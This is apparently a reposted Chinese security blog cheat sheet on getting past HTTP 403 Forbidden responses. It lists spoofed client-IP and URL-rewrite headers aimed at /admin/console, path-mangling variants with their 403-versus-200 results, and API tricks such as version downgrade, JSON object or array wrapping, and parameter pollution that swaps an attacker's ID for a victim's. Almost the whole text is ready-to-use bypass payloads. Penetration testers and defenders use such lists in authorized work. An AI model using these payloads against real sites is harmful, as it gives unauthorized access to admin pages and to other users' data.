HTTP 标头模糊测试
在某些情况下,可以通过更改请求的标头并包含内部地址来访问页面:
X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded: 127.0.0.1 Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 X-Original-URL: 127.0.0.1 Client-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Cluster-Client-IP: 127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 Host: localhost
如果路径受到保护,您可以尝试使用以下其他标头绕过路径保护:
X-Original-URL: /admin/console X-Rewrite-URL: /admin/console
路径模糊测试 我们可以尝试对 url 进行一些更改,使用特殊字符或包含 HTML 编码:
http://site.com/secret –> HTTP 403 Forbidden http://site.com/SECRET –> HTTP 200 OK http://site.com/secret/ –> HTTP 200 OK http://site.com/secret/. –> HTTP 200 OK http://site.com//secret// –> HTTP 200 OK http://site.com/./secret/.. –> HTTP 200 OK http://site.com/;/secret –> HTTP 200 OK http://site.com/.;/secret –> HTTP 200 OK http://site.com//;//secret –> HTTP 200 OK http://site.com/secret.json –> HTTP 200 OK (ruby)
API bypasses
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
原文始发于微信公众号(TtTeam):Fuzz 403 Bypass
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论